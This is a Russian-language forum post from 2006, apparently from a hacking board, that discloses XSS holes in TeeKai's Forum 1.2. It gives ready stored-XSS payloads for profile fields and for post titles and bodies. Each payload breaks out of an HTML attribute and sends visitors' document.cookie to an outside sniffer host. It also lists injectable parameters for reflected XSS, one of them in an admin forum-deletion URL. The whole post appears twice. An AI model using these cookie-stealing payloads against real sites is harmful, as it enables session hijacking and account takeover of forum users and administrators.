_kREveDKo_
26.04.2006, 22:13
TeeKai's Forum version 1.2
Этот движок я нашёл у себя на халявном диске большого срока давности...Поэтому я думаю он такой и дырявый.
Поставил на локалку - и в лицо брызнуло ошибками. Странно, но на оффсайте производителя я не нашёл
ничего связанного с форумами... (http://www.teekai.info/)
1) Регестрируем пользователя. Лезем в профиль, вбиваем скрипт для вставки сниффера полях имени, возраста,
паги и урла для неё, страны.
Непалевный способ для поля url:
http://ya.ru"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><a target="_blank
Непалевный способ для поля name:
Name"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><font size="1
Непалевный способ для поля возраста, страны и названия паги:
la"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><input class="fields
Теперь наш скрипт выполняется при просмотре нашего профиля (там выводятся все юзверы сразу),a также при просмотре
созданной нами темы.
2) Создаём новый пост. Вставляем скрипт в поле для заголовка(title) и в поле для сообщения - оба они так и ждут, чтобы
через них вставили сниффер =).
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Теперь наш скрипт выполняется при просмотре созданного топика.
3) Пассивные:
http://ya.ru/tee/index.php?action=admin&cmd=manageforums&choose=deleteforums&id=[_X_S_S_] (из админки)
http://ya.ru/tee/viewtopic.php?action=viewtopic&cat=[_X_S_S_]&forumname=[_X_S_S_]&command=viewtopic&name=[_X_S_S_]&date=[_X_S_S_]&time=[_X_S_S_]
P.S. И снова я заранее извиняюсь, если эта инфа уже была где-то выложена до меня... Мне как всегда лень и жаль трафика проверять, первый ли я в нахождении багов...
Этот движок я нашёл у себя на халявном диске большого срока давности...Поэтому я думаю он такой и дырявый.
Поставил на локалку - и в лицо брызнуло ошибками. Странно, но на оффсайте производителя я не нашёл
ничего связанного с форумами... (http://www.teekai.info/)
1) Регестрируем пользователя. Лезем в профиль, вбиваем скрипт для вставки сниффера полях имени, возраста,
паги и урла для неё, страны.
Непалевный способ для поля url:
http://ya.ru"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><a target="_blank
Непалевный способ для поля name:
Name"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><font size="1
Непалевный способ для поля возраста, страны и названия паги:
la"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><input class="fields
Теперь наш скрипт выполняется при просмотре нашего профиля (там выводятся все юзверы сразу),a также при просмотре
созданной нами темы.
2) Создаём новый пост. Вставляем скрипт в поле для заголовка(title) и в поле для сообщения - оба они так и ждут, чтобы
через них вставили сниффер =).
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Теперь наш скрипт выполняется при просмотре созданного топика.
3) Пассивные:
http://ya.ru/tee/index.php?action=admin&cmd=manageforums&choose=deleteforums&id=[_X_S_S_] (из админки)
http://ya.ru/tee/viewtopic.php?action=viewtopic&cat=[_X_S_S_]&forumname=[_X_S_S_]&command=viewtopic&name=[_X_S_S_]&date=[_X_S_S_]&time=[_X_S_S_]
P.S. И снова я заранее извиняюсь, если эта инфа уже была где-то выложена до меня... Мне как всегда лень и жаль трафика проверять, первый ли я в нахождении багов...